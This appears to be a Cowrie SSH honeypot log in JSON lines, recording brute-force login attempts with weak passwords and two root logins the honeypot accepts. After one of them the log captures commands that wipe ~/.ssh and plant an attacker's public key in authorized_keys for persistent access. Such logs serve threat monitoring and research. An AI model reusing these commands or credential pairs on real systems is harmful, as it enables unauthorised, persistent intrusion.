{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:47.868493Z","src_ip":"212.227.235.229","session":"d5a8fe3099d4"}
{"eventid":"cowrie.login.failed","username":"lili","password":"lili","message":"login attempt [lili/lili] failed","sensor":"my-vps","timestamp":"2025-08-31T05:13:48.236978Z","src_ip":"212.227.235.229","session":"d5a8fe3099d4"}
{"eventid":"cowrie.session.closed","duration":"45.5","message":"Connection lost after 45.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:48.467752Z","src_ip":"212.227.125.160","session":"6dc4bc0092f9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:49.321082Z","src_ip":"212.227.235.229","session":"d5a8fe3099d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34800,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6fdca122f6d","protocol":"ssh","message":"New connection: 212.227.125.160:34800 (1.2.3.4:22) [session: f6fdca122f6d]","sensor":"my-vps","timestamp":"2025-08-31T05:13:50.322456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:13:51.261304Z","src_ip":"212.227.125.160","session":"f6fdca122f6d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:13:51.262001Z","src_ip":"212.227.125.160","session":"f6fdca122f6d"}
{"eventid":"cowrie.login.failed","username":"server","password":"P@ssw0rd123","message":"login attempt [server/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:13:53.725747Z","src_ip":"212.227.125.160","session":"f6fdca122f6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40258,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d73b51391d9","protocol":"ssh","message":"New connection: 212.227.125.160:40258 (1.2.3.4:22) [session: 1d73b51391d9]","sensor":"my-vps","timestamp":"2025-08-31T05:13:54.435482Z"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:55.096459Z","src_ip":"212.227.125.160","session":"f6fdca122f6d"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":27435,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ba95fe5a4dd","protocol":"ssh","message":"New connection: 80.94.95.15:27435 (1.2.3.4:22) [session: 3ba95fe5a4dd]","sensor":"my-vps","timestamp":"2025-08-31T05:14:01.548324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:14:01.549103Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:14:01.600481Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc","message":"login attempt [abc/abc] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:01.926738Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc123","message":"login attempt [abc/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:02.980589Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abcd123","message":"login attempt [abc/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:04.033879Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abcd1234","message":"login attempt [abc/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:05.088210Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc1234","message":"login attempt [abc/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:06.141974Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:07.198220Z","src_ip":"80.94.95.15","session":"3ba95fe5a4dd"}
{"eventid":"cowrie.session.closed","duration":"26.8","message":"Connection lost after 26.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:21.197278Z","src_ip":"212.227.125.160","session":"1d73b51391d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51632,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1e7df08b5e1","protocol":"ssh","message":"New connection: 212.227.235.229:51632 (1.2.3.4:22) [session: e1e7df08b5e1]","sensor":"my-vps","timestamp":"2025-08-31T05:14:27.548299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:14:28.872343Z","src_ip":"212.227.235.229","session":"e1e7df08b5e1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:14:28.873276Z","src_ip":"212.227.235.229","session":"e1e7df08b5e1"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:31.305520Z","src_ip":"212.227.235.229","session":"109cd9742703"}
{"eventid":"cowrie.login.failed","username":"server","password":"letmein","message":"login attempt [server/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:34.396251Z","src_ip":"212.227.235.229","session":"e1e7df08b5e1"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:36.060473Z","src_ip":"212.227.235.229","session":"e1e7df08b5e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57074,"dst_ip":"1.2.3.4","dst_port":22,"session":"644c9aca7cf2","protocol":"ssh","message":"New connection: 212.227.235.229:57074 (1.2.3.4:22) [session: 644c9aca7cf2]","sensor":"my-vps","timestamp":"2025-08-31T05:14:38.537931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:14:38.538853Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:14:38.813214Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.login.success","username":"root","password":"L@y3rh0st2024","message":"login attempt [root/L@y3rh0st2024] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:14:39.912877Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:14:40.483358Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:14:40.484120Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:14:40.485263Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:40.761404Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41988,"dst_ip":"1.2.3.4","dst_port":22,"session":"26feabc53f8d","protocol":"ssh","message":"New connection: 212.227.235.229:41988 (1.2.3.4:22) [session: 26feabc53f8d]","sensor":"my-vps","timestamp":"2025-08-31T05:14:41.167394Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:14:41.374011Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:14:41.374837Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:14:41.651995Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:41.652951Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58156,"dst_ip":"1.2.3.4","dst_port":22,"session":"5587468cc1e1","protocol":"ssh","message":"New connection: 212.227.235.229:58156 (1.2.3.4:22) [session: 5587468cc1e1]","sensor":"my-vps","timestamp":"2025-08-31T05:14:41.925160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:14:41.925857Z","src_ip":"212.227.235.229","session":"5587468cc1e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:14:42.200455Z","src_ip":"212.227.235.229","session":"5587468cc1e1"}
{"eventid":"cowrie.session.closed","duration":"77.6","message":"Connection lost after 77.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:42.844731Z","src_ip":"212.227.235.229","session":"109cd9742703"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:14:43.339498Z","src_ip":"212.227.235.229","session":"5587468cc1e1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:44.616059Z","src_ip":"212.227.235.229","session":"5587468cc1e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59314,"dst_ip":"1.2.3.4","dst_port":22,"session":"7412f909673d","protocol":"ssh","message":"New connection: 212.227.235.229:59314 (1.2.3.4:22) [session: 7412f909673d]","sensor":"my-vps","timestamp":"2025-08-31T05:14:44.888179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:14:44.889162Z","src_ip":"212.227.235.229","session":"7412f909673d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:14:45.161636Z","src_ip":"212.227.235.229","session":"7412f909673d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:14:46.080396Z","src_ip":"212.227.235.229","session":"26feabc53f8d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:14:46.081743Z","src_ip":"212.227.235.229","session":"26feabc53f8d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:14:46.291378Z","src_ip":"212.227.235.229","session":"7412f909673d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:46.565155Z","src_ip":"212.227.235.229","session":"644c9aca7cf2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:14:46.566162Z","src_ip":"212.227.235.229","session":"7412f909673d"}
{"eventid":"cowrie.session.connect","src_ip":"115.135.72.15","src_port":48124,"dst_ip":"1.2.3.4","dst_port":23,"session":"46008533bdd9","protocol":"telnet","message":"New connection: 115.135.72.15:48124 (1.2.3.4:23) [session: 46008533bdd9]","sensor":"my-vps","timestamp":"2025-08-31T05:14:46.948416Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41432,"dst_ip":"1.2.3.4","dst_port":22,"session":"953f8a9adbad","protocol":"ssh","message":"New connection: 212.227.125.160:41432 (1.2.3.4:22) [session: 953f8a9adbad]","sensor":"my-vps","timestamp":"2025-08-31T05:14:48.752935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:14:49.232060Z","src_ip":"212.227.125.160","session":"953f8a9adbad"}
